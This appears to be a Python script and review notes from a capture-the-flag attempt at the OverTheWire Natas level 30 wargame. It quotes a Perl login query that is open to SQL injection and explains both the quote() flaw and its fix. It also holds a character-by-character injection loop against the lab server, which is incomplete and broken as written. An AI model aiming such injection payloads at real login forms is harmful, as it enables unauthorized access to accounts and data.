# This is the exploitable Perl DB query (quoted here as a Python string so it
# is not executed by this script).
#
# NOTE(review): why the quoted code is unsafe, and what the fix looks like:
# - The SQL text is built by concatenation and relies on $dbh->quote() alone
#   to neutralise the input, instead of bound placeholders.
# - param() is called directly inside quote()'s argument list, i.e. in list
#   context. If param() is CGI.pm's (not shown here - presumably), a request
#   that repeats a field makes it return several values, and the extra value
#   becomes quote()'s optional second argument (the data type). The Stack
#   Overflow post linked below describes how a caller-chosen type can make
#   quote() return the value without quoting it.
# - Mitigation: prepare the statement with "?" placeholders, pass the values
#   to execute(), and force a single value per field with
#   scalar(param('username')) / scalar(param('password')).
# - "print @$ver" after "Select *" echoes every column of the matched row to
#   the client, without HTML escaping.
# - The submitted password is compared as-is inside the query, which suggests
#   it is not stored as a salted hash - confirm against the schema.
"""if ('POST' eq request_method && param('username') && param('password')){
my $dbh = DBI->connect( "DBI:mysql:database_name","database_name", "<censored>", {'RaiseError' => 1});
my $query="Select * FROM users where username =".$dbh->quote(param('username')) . " and password =".$dbh->quote(param('password'));
my $sth = $dbh->prepare($query);
$sth->execute();
my $ver = $sth->fetch();
if ($ver){
print "win!<br>";
print "here is your result:<br>";
print @$ver;
}
else{
print "fail";
}
$sth->finish();
$dbh->disconnect();
}"""
# All I could find was this SO post: https://stackoverflow.com/questions/40273267/is-perl-function-dbh-quote-still-secure
# So that is what I tried, but maybe I just don't get it.
- import requests
- import re
- import string
# Alphabet iterated by natas30(): ASCII letters followed by the digits 0-9.
CHAR_SET = string.ascii_letters + string.digits
# Not referenced anywhere in the visible script (the name is spelled LENGHT).
PASSWORD_LENGHT = 32
# Single requests.Session used for every POST issued by natas30().
session = requests.Session()
def natas30(url):
    """Send one POST per character of CHAR_SET and print the outcome of each.

    Args:
        url: Address the form data is posted to through the shared ``session``.

    Prints "FAILED" when the response text contains 'fail'; otherwise prints
    the current character followed by "SUCCES". Returns None.
    """
    for char in CHAR_SET:
        # I think it needs to be done like this,
        # see https://stackoverflow.com/questions/40273267/is-perl-function-dbh-quote-still-secure
        # But unsure how to proceed after this
        # NOTE(review): the dict literal repeats the "username" key. Python
        # keeps only the last value, so the form data actually sent is
        # username=30 and password=x on every iteration.
        params = {
            "username": 'natas30" and password like binary "{char}%',
            "username": 30,
            "password": "x",
        }
        body = session.post(url, data=params).text
        # print(body)
        if 'fail' not in body:
            print(char)
            print("SUCCES")
            continue
        print("FAILED")
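if __name__ == '__main__':
    import os

    # Keep the HTTP Basic credentials out of the source and out of the URL:
    # a password embedded in a URL ends up in pastes, shell history and logs.
    # The password is read from the environment (variable name chosen here)
    # and attached to the shared session instead.
    # NOTE(review): the URL is plain http, so the Basic credentials travel
    # unencrypted; prefer https if the host offers it.
    session.auth = ('natas30', os.environ['NATAS30_PASSWORD'])
    url = 'http://natas30.natas.labs.overthewire.org/'
    natas30(url)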